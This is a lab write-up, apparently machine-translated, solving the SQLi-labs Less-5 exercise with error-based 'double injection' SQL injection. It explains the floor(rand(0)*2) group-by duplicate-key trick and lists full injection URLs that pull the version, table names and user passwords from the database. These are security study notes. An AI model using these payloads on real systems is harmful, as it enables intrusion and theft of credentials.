Less-5 GET - Double Injection -Single quotes - String
1. original page
2.? Id = 1
input not correctly query the database, but directly returns you are in ...
So to make an error, we want to display information.
3.?id=1 '
' '1''LIMIT 0,1' -> (to remove the single quotes) '1''LIMIT 0,1 -> Since we are input id = 1' is input = 1 'it can be determined as' input'LIMIT 0,1
SQL:
Select login_name,password from admin where id=’input’ limit 0,1;
4. Double check that two nested queries, i.e. select ... (select ...). Inside it is called sub-select query execution order is executed first sub-queries, and then perform outside of select. When a correct another error, can use the concat () [String connection function] The correct result of the connection in the error information
Double injection mainly involves several functions:
- rand () random function that returns a value between 0 and 1
- Floor (a) rounding function, a return or less, and a value of a nearest integer
- Total count () aggregate function, returns the query object
- group by clause grouping of statements, in accordance with the results of the query packet
Given Principle:
SELECT COUNT (*) Group from Table by Floor (RAND (0) * 2);
floor value (rand (0) * 2) it is qualitative, not completely random, is a pseudo-random, the value 011011
Execution process:
First: group by floor (0), group by 0, no skip
second: group by 1
Third: group by 1, because the key value corresponding to
the fourth: group by 0
fifth: group by 1, no insert, to create a new key value of 1, will be key = 1 and the previous conflict error.
Execution floor (rand (0) * 2) 5 times, 3 times to execute the query.
Basic routines:
the SELECT COUNT (*), concat (([subqueries write here]), floor (rand () * 2)) as a from [table_name] group by a;
The access to the database
? Id = 0 'union select 1 , count (*), concat ((select concat (version (), 0x3a, 0x3a, database (), 0x3a, 0x3a, user (), 0x3a) limit 0,1 ), Floor (RAND (0) * 2)) AS A from information_schema.tables by Group A - +
6. The acquisition table
? id = 0 'union select 1 , count (*), concat ((select concat (table_name, 0x3a, 0x3a) from information_schema.tables where table_schema = database ()), floor (rand (0) * 2)) as a from information_schema.tables group by a - +
a return not only more than one data, to be used to limit limit
? id = 0 'union select 1 , count (*), concat ((select concat (table_name, 0x3a, 0x3a) from information_schema.tables where table_schema = database () limit 0,1), floor (rand (0) * 2 )) as a from information_schema.tables group by a - +
View other tables, limit values can be changed
?id=0’ union select 1,count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2))as a from information_schema.tables group by a --+
7. obtaining user information
?id=0’ union select 1,count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 1,1),floor(rand(0)*2))as a from information_schema.tables group by a --+
?id=0’ union select 1,count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 3,1),floor(rand(0)*2))as a from information_schema.tables group by a --+
Own a little more understanding and method, if misunderstood or local representation is wrong, please correct me.
